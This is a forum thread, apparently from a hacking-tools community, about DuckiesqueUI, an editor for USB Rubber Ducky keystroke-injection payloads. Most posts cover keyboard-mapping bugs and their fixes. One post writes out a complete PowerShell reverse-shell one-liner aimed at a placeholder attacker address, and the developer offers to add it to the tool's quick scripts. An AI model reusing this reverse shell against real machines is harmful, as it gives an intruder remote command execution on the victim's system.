kdodge Posted March 28 Share Posted March 28 (edited) A DuckyScript IDE, with syntax highlighting, code execution and testing, and inject.bin file generation. Windows, MacOS, and Linux compatible. Rapid Protocoding Toolkit for the USB Rubber Ducky https://github.com/slacker69/DuckiesqueUI Releases are here: https://github.com/slacker69/DuckiesqueUI/releases Edited March 29 by kdodge Quote Link to post Share on other sites
Scout Posted Wednesday at 07:13 PM Share Posted Wednesday at 07:13 PM Hey I am using the tool now, but I am seeing an odd issue. My payload is using "=" but they are being typed as "+" Do you know what might be causing this? Quote Link to post Share on other sites
chrizree Posted Wednesday at 08:46 PM Share Posted Wednesday at 08:46 PM What language is your "victim" using and what language have you specified when creating the inject.bin file? What's the result if you use the payload ducky code and encode it with an official tool, same thing? Quote Link to post Share on other sites
Scout Posted Wednesday at 09:02 PM Share Posted Wednesday at 09:02 PM The language is set to default, but I also set it to US. I don't think it's an issue with the Duckyscript, rather how the DuckiequeUI tool is handeling the "=." I was poking around the source code and I guess there is a tricky thing around the Windows API and the "=." The author listed a TODO around having to figure out how to get around this issue. I am not strong enough with Windows APIs or CPP to even begin to help with a solution though. Quote Link to post Share on other sites
chrizree Posted Wednesday at 09:24 PM Share Posted Wednesday at 09:24 PM it's nothing I will spend any time on either, I'm perfectly OK with using an ordinary text editor and the official tools in order to create ducky payload scripts and encoded files Quote Link to post Share on other sites
kdodge Posted Thursday at 02:02 AM Author Share Posted Thursday at 02:02 AM I have fixed the problem of + for =. Thank you for discovering it! Quote Link to post Share on other sites
Scout Posted Thursday at 03:36 PM Share Posted Thursday at 03:36 PM 18 hours ago, chrizree said: it's nothing I will spend any time on either, I'm perfectly OK with using an ordinary text editor and the official tools in order to create ducky payload scripts and encoded files If you read my original post then you know that I was looking for another workflow, and that I was unhappy with debugging using official tools. DuckiequeUI seemed to fit my needs perfectly, which is why I was so invested in resolving this bug. 13 hours ago, kdodge said: I have fixed the problem of + for =. Thank you for discovering it! You are awesome! I am going to try downloading this and working with it today. I will report back. Are you planning up update the repo with a new release? Otherwise I will compile it myself. Quote Link to post Share on other sites
Scout Posted Thursday at 03:39 PM Share Posted Thursday at 03:39 PM 1 minute ago, Scout said: Are you planning up update the repo with a new release? Otherwise I will compile it myself. Scratch that, you already did. And it is working! Thanks again for this great tool and being so quick to fix it. 1 Quote Link to post Share on other sites
kdodge Posted Thursday at 04:32 PM Author Share Posted Thursday at 04:32 PM Cool, I'm glad it helps! I have plans to add a new feature too, some quick script buttons that allow loading of basic functions at the current cursors location, like GUI r for instance. If you have any ideas you would like me to add, I will do my best to see if I can implement them (as long as it's not too difficult, lol) Quote Link to post Share on other sites
Scout Posted Thursday at 07:04 PM Share Posted Thursday at 07:04 PM Hey so I found one more bug--it looks like on Windows it doesn't like the "|" and renders just a "?". I also found that when I script "\" it is typed out as a "/". This is interesting because both symbols are on the same button on my keyboard. For reference, I am trying to run the following simple one-liner reverse shell PowerShell payload: powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attackerIP',attackerPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" Again, sorry I can't help to contribute, but I will sure be a tester! Ha! 1 Quote Link to post Share on other sites
kdodge Posted Thursday at 10:11 PM Author Share Posted Thursday at 10:11 PM Yep, I got the slash and backslash keys reversed. Thank you. New version is up Quote Link to post Share on other sites
Scout Posted 22 hours ago Share Posted 22 hours ago On 4/8/2021 at 3:11 PM, kdodge said: Yep, I got the slash and backslash keys reversed. Thank you. New version is up Rad--and I like the new sidebar! That's nice for quickly adding common actions. 1 Quote Link to post Share on other sites
kdodge Posted 18 hours ago Author Share Posted 18 hours ago 4 hours ago, Scout said: Rad--and I like the new sidebar! That's nice for quickly adding common actions. Can I add your powershell script to the quick scripts? Is there any other short codes you would like me to add? Quote Link to post Share on other sites
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.